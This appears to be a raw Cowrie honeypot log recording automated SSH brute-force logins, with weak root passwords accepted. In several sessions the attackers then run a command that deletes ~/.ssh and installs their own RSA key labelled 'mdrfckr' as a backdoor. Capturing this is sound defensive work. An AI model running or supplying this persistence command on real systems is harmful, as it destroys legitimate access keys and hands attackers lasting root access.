{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:30:07.243357Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:07.492767Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:30:08.094151Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:30:08.094865Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:30:08.343863Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:08.344751Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49521,"dst_ip":"1.2.3.4","dst_port":22,"session":"3747fe423f21","protocol":"ssh","message":"New connection: 212.227.235.229:49521 (1.2.3.4:22) [session: 3747fe423f21]","sensor":"my-vps","timestamp":"2025-09-09T02:30:08.595779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:08.600143Z","src_ip":"212.227.235.229","session":"3747fe423f21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:08.849411Z","src_ip":"212.227.235.229","session":"3747fe423f21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:30:09.849977Z","src_ip":"212.227.235.229","session":"3747fe423f21"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:11.105960Z","src_ip":"212.227.235.229","session":"3747fe423f21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50147,"dst_ip":"1.2.3.4","dst_port":22,"session":"40475e265247","protocol":"ssh","message":"New connection: 212.227.235.229:50147 (1.2.3.4:22) [session: 40475e265247]","sensor":"my-vps","timestamp":"2025-09-09T02:30:11.349360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:11.358552Z","src_ip":"212.227.235.229","session":"40475e265247"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:11.605756Z","src_ip":"212.227.235.229","session":"40475e265247"}
{"eventid":"cowrie.session.closed","duration":9.751442909240723,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:11.775486Z","src_ip":"212.227.125.160","session":"90fa503beb93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33414,"dst_ip":"1.2.3.4","dst_port":22,"session":"e544c81a8be2","protocol":"ssh","message":"New connection: 212.227.235.229:33414 (1.2.3.4:22) [session: e544c81a8be2]","sensor":"my-vps","timestamp":"2025-09-09T02:30:12.244982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:12.246791Z","src_ip":"212.227.235.229","session":"e544c81a8be2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:12.607131Z","src_ip":"212.227.235.229","session":"40475e265247"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:12.627291Z","src_ip":"212.227.235.229","session":"e544c81a8be2"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:12.856957Z","src_ip":"212.227.235.229","session":"6dc769e969d9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:12.858080Z","src_ip":"212.227.235.229","session":"40475e265247"}
{"eventid":"cowrie.login.failed","username":"tester","password":"password123","message":"login attempt [tester/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:30:14.144568Z","src_ip":"212.227.235.229","session":"e544c81a8be2"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:15.534090Z","src_ip":"212.227.235.229","session":"e544c81a8be2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44108,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a1f334578c8","protocol":"telnet","message":"New connection: 212.227.235.229:44108 (1.2.3.4:23) [session: 7a1f334578c8]","sensor":"my-vps","timestamp":"2025-09-09T02:30:19.128199Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47010,"dst_ip":"1.2.3.4","dst_port":22,"session":"36163d1c4f9d","protocol":"ssh","message":"New connection: 212.227.235.229:47010 (1.2.3.4:22) [session: 36163d1c4f9d]","sensor":"my-vps","timestamp":"2025-09-09T02:30:35.030237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:35.031176Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:35.331018Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.login.success","username":"root","password":"test1234!","message":"login attempt [root/test1234!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:36.571505Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:30:37.242647Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:30:37.243361Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:30:37.244588Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:37.545321Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:30:38.162821Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:30:38.163549Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:30:38.466650Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:38.467599Z","src_ip":"212.227.235.229","session":"36163d1c4f9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3fb81a100e9","protocol":"ssh","message":"New connection: 212.227.235.229:48502 (1.2.3.4:22) [session: d3fb81a100e9]","sensor":"my-vps","timestamp":"2025-09-09T02:30:38.672437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:38.674157Z","src_ip":"212.227.235.229","session":"d3fb81a100e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:38.926183Z","src_ip":"212.227.235.229","session":"d3fb81a100e9"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11768,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bc43ff1d9de","protocol":"ssh","message":"New connection: 185.152.45.241:11768 (1.2.3.4:22) [session: 6bc43ff1d9de]","sensor":"my-vps","timestamp":"2025-09-09T02:30:39.600548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:30:39.601485Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:30:39.695271Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:30:39.940111Z","src_ip":"212.227.235.229","session":"d3fb81a100e9"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc123*","message":"login attempt [root/Abc123*] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:30:39.954045Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:30:40.115699Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.116505Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.117335Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.165000Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:30:40.273785Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.274839Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:30:40.323465Z","src_ip":"185.152.45.241","session":"6bc43ff1d9de"}
